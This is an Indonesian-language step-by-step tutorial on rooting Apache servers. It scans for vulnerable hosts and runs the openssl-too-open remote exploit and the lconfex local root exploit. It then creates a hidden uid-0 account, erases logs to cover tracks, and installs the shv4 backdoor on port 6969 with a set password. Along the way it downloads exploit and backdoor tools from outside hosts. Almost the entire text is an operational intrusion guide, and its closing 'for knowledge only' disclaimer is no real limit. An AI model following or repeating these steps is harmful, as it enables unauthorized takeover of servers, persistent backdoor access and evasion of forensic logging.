Rooting Apache Lewat OpenSSL


  • VR-X69
  • sectors2001[~@t~]yahoogroups[~d.t~]com
  • Saturday, December 4th, 2004
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


  1. Download Apache Chunked Scanner
  2. Download putty.exe
  3. Scanning for IP range menggunakan Apache Chunked Scanner
  4. Dapet target buka putty
  5. login ke shell account lewat ssh <— untuk user windows harus punya shell account di suatu server yang pakai linux langsung aja ke langkah 6 dan ngga perlu putty
  6. Download openSSL source code ke shell account kita dengan perintah ‘wget www.tempat-download.com/openssl-too-open.tar.gz’
  7. ekstrak file dengan perintah ‘tar -zxvf openssl-too-open.tar.gz’
  8. masuk ke direktorinya dengan mengetikan ‘cd openssl-too-open’
  9. ketik ‘make’ lalu ketik ‘chmod +x openssl’
  10. ketik ‘./openssl-too-open’ akan terlihat jenis2 server yang bisa di rooting
  11. target Scanning dari Apache Chunked Scanner anggap saja
    IP : 203.10.10.10
    Apache : Apache 1.3.23
    OS Linux : RedHat 7.3
    Maka ketikan ‘./openssl-too-open -a 0x0b -v 203.10.10.10′
  12. Mulai local xploit ketik ‘mkdir /var/tmp’ lalu masuk ke dir ketik ‘cd /var/tmp’
  13. Ketik ‘wget www.tempat-download.com/local.tar.gz’
  14. Ketik ‘tar xzf local.tar.gz’
  15. Ketik ‘cd local’
  16. Ketik ‘./lconfex -p’ akan diinformasikan shellcode, padstring, dan magic-number
  17. Buat direktori ‘segfault.eng’ dengan file ‘segfault.eng’ lalu command touch dan kemudian commad ‘./lconfex -s (shellcode) -m (padstring) -r (magic-number)
    untuk perintahnya:
    ‘mkdir segfault.eng ; touch segfault.eng/segfault.eng’
    ‘./lconfex -s (shellcode) -m (pandstring) -r (magic-number)’
    untuk perintah diatas masalah shellcode, padstring, magic-number kamu pasti tau setelah perintah 17 dijalankan.
  18. Ketik ‘id’ klo muncul —> root uid=0(root) gid=48(apache) groups=48(apache),89(sympa) <— anda adalah root

Tahap adduser, pembersihan log, backdoor

 

  1. ketik ‘/usr/sbin/useradd vr -u 0 -o -g root -s /bin/bash -d /dev/.vr passwd -d vr <— add user root nama vr
    /usr/sbin/useradd vr <— menambahkan login user nama vr
    root <— akses root
    /bin/bash -d /dev/.vr <— create dir vr
    passwd -d vr <— password vr
    * catatan : login, direktori dan password harus sama
  2. Buka new session pakek putty dan mulai login ke target
  3. Ketik ‘lastlog | grep vr’
  4. Download tools untuk menghapus jejak kita ketik ‘wget www.tempat-download.com/remove.c’
  5. compile file tersebut ketik ‘gcc -o r remove.c DGENERIC’
  6. hapus log user vr ketik ‘./remove vr’
  7. Install backdoor ketik ‘wget www.alamat-download.com/backdoor.tar.gz’
  8. ketik ‘tar xzf backdoor.tar.gz’
  9. Ketik ‘cd shv4′
  10. Ketik ‘./setup n3rd 6969′ —> n3rd = password login backdoor 6969 = port backdoor
  11. menghapus semua kemungkinan mengarah ke kita ; user dan direktori yang kita buat ketik ‘/usr/sbin/userdel -r vr’
  12. BERES… silahkan login ke shell dengan port 6969 dengan password n3rd pada target :p

Jangan diacak2 ya targetnya karena semua ini untuk pengetahuan segala bentuk penyalahgunaan bukan tanggung jawab saya.

VR-X69 (NERD)


//E.O.F